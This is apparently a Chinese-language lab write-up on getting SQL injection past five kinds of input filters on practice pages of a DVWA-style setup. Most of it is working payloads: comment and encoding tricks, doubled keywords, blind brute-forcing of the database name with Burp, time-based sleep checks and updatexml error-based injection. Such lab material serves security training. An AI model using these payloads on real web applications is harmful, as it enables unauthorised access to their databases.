sqli-bypass

提示说明：
————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
index1.php 空格过滤

index2.php 关键字过滤 and /or 大小写

index3.php 双写关键字 || mysql 隐形转换 poc 1''a'=if(user()+like+'r%',sleep(2),1)--+ (sleep修改成exp也可)//适用于字符型

index4.php 双重url编码

index5.php 绕过正则匹配
poc1:1'|| mid(schema(),1,1) like'd
poc2:1'anandd+mid(ususerer(),1,1)like'r

——————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————
index1:

使用bp爆破出数据库长度，payload:'and/*!length(schema())='1'*/%23，爆破得出数据库长度为4。

使用bp爆破出数据库名称，payload:'and/*!mid(schema(),1,1)='1'*/%23，爆破得出数据库长度为dvwa。

index2:

使用bp爆破出数据库长度，payload:'%26%26length(database())='1'%23 ，爆破得出数据库长度为4。

使用bp爆破出数据库名称，payload:'%26%26mid(database(),1,1)='1'%23，爆破得出数据库长度为dvwa。

index3:

使用bp爆破出数据库长度，payload:1'%26%26length(database())='4'%23 ，爆破得出数据库长度为4。

使用bp爆破出数据库名称，payload:1'%26%26ascii(mid(database(),§1§,1))='§97§'%23，爆破得出数据库长度为dvwa。

index4:

直接使用报错注入。payload:1'%26%26(updatexml(1,concat(0x7e,database()),1))-- +

index5:

直接使用爆破。payload:1'anandd+mid(schema(),1,1)like'r